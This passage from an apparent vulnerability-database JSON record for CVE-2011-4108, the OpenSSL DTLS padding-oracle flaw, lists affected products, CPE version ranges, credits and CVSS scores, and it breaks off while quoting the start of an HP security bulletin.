"aura application server sip core pb26", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "sterling connect:direct", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.6" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "big-ip webaccelerator hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "xiv storage system gen3 mtm 11.1.0.a", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2812-114" }, { "model": "9.0-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "xiv storage system gen3 mtm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2810-11411" }, { "model": "sterling connect:direct", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.61" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "linux lts powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "enterprise virtualization hypervisor for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "60" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "linux enterprise sdk sp4", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "big-ip apm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56002" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "76000" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.1" }, { "model": "aura experience portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "tivoli netcool/system service monitor fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1" }, { "model": "junos space r1.8", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.1" }, { "model": "big-ip analytics hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "informix genero", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.40" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0.00" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip asm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip ltm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "aura system platform sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip analytics hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "linux enterprise desktop sp1", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.3" }, { "model": "reflection for unix and openvms", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "20080" }, { "model": "sterling connect:direct for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.0" }, { "model": "enterprise virtualization hypervisor for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "50" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "big-ip psm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "tivoli netcool/system service monitor fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "tivoli network manager fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.9" }, { "model": "jboss enterprise web server for windows", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "1.0.2" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0" }, { "model": "big-ip ltm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "tivoli netcool/system service monitor fp7", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "9.0-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip apm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip wom hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.4" }, { "model": "enterprise linux desktop optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77100" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "hardware management console 7r7.1.0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "xiv storage system gen3 mtm 11.0.1.a", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2812-114" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10500" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "big-ip analytics hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77000" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "ip deskphone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "96x16.3" }, { "model": "reflection", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "14.0" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.2" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.00" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "big-ip psm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "tivoli workload scheduler distributed fp04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "enterprise linux desktop workstation client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "docucolor dc252", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "0" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0.1" }, { "model": "aura application enablement services", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "ds8870", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "linux enterprise desktop sp4", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "big-ip pem hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "aura conferencing standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2" }, { "model": "esxi", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.0" }, { "model": "hardware management console 7r7.2.0 sp1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.2" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "pfsense", "scope": "eq", "trust": 0.3, "vendor": "bsdperimeter", "version": "2.0.1" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "message networking", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.2.5" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.1" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.1.1" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "big-ip psm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "messaging storage server sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "project openssl 1.0.0a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "xiv storage system gen3 mtm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2812-11411" } ], "sources": [ { "db": "CERT/CC", "id": "VU#737740" }, { "db": "BID", "id": "51281" }, { "db": "CNNVD", "id": "CNNVD-201201-057" }, { "db": "NVD", "id": "CVE-2011-4108" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "0.9.8r", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6h:bogus:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.5a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8q:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.2b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.0.0e", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2011-4108" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Nadhem Alfardan and Kenny Paterson, Information Security Group at Royal Holloway, University of London, Ben Laurie, Adam Langley, Andrew Chi, BBN Technologies and Andrey Kulikov", "sources": [ { "db": "BID", "id": "51281" } ], "trust": 0.3 }, "cve": "CVE-2011-4108", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULMON", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CVE-2011-4108", "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 0.1, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2011-4108", "trust": 1.0, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201201-057", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2011-4108", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2011-4108" }, { "db": "CNNVD", "id": "CNNVD-201201-057" }, { "db": "NVD", "id": "CVE-2011-4108" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The DTLS implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack. Fiery Network Controllers for Xerox DocuColor 242/252/260 Printer/Copier use a vulnerable version of OpenSSL (0.9.8o). OpenSSL prone to multiple security vulnerabilities. \nAn attacker may leverage these issues to obtain sensitive information, cause a denial-of-service condition and perform unauthorized actions. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c03360041\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c03360041\nVersion: 1\n\nHPSBMU02786 SSRT100877 rev.1 - HP System Management Homepage (SMH) Running on\nLinux and Windows, Remote Unauthorized Access, Disclosure of Information,\nData Modification, Denial of Service (DoS), Execution of Arbitrary Code\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2012-06-26\nLast Updated: 2012-06-26\n\nPotential Security Impact: Remote unauthorized access, disclosure of\ninformation, data modification, Denial of Service (DoS), execution of\narbitrary code\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP System\nManagement Homepage (SMH) running on Linux and Windows. The vulnerabilities\ncould be exploited remotely resulting in unauthorized access, disclosure of\ninformation, data modification, Denial of Service (DoS), and execution of\narbitrary code. \n\nReferences: CVE-2011-1944, CVE-2011-2821, CVE-2011-2834, CVE-2011-3379,\nCVE-2011-3607, CVE-2011-4078, CVE-2011-4108, CVE-2011-4153, CVE-2011-4317,\nCVE-2011-4415, CVE-2011-4576, CVE-2011-4577, CVE-2011-4619, CVE-2011-4885,\nCVE-2012-0021, CVE-2012-0027, CVE-2012-0031, CVE-2012-0036, CVE-2012-0053,\nCVE-2012-0057, CVE-2012-0830, CVE-2012-1165, CVE-2012-1823,\nCVE-2012-2012 (AUTOCOMPLETE enabled), CVE-2012-2013 (DoS),\nCVE-2012-2014 (Improper input validation), CVE-2012-2015 (Privilege\nElevation),\nCVE-2012-2016 (Information disclosure),\nSSRT100336, SSRT100753, SSRT100669, SSRT100676,\nSSRT100695, SSRT100714, SSRT100760, SSRT100786,\nSSRT100787, SSRT100815, SSRT100840, SSRT100843, SSRT100869\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP System Management Homepage (SMH) before v7.1.1 running on Linux and\nWindows. \n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2012-2012 (AV:N/AC:L/Au:N/C:C/I:C/A:P) 9.7\nCVE-2012-2013 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2012-2014 (AV:N/AC:M/Au:S/C:N/I:N/A:N) 6.8\nCVE-2012-2015 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 6.5\nCVE-2012-2016 (AV:L/AC:M/Au:S/C:C/I:N/A:N) 4.4\nCVE-2011-1944 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2011-2821 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2011-2834 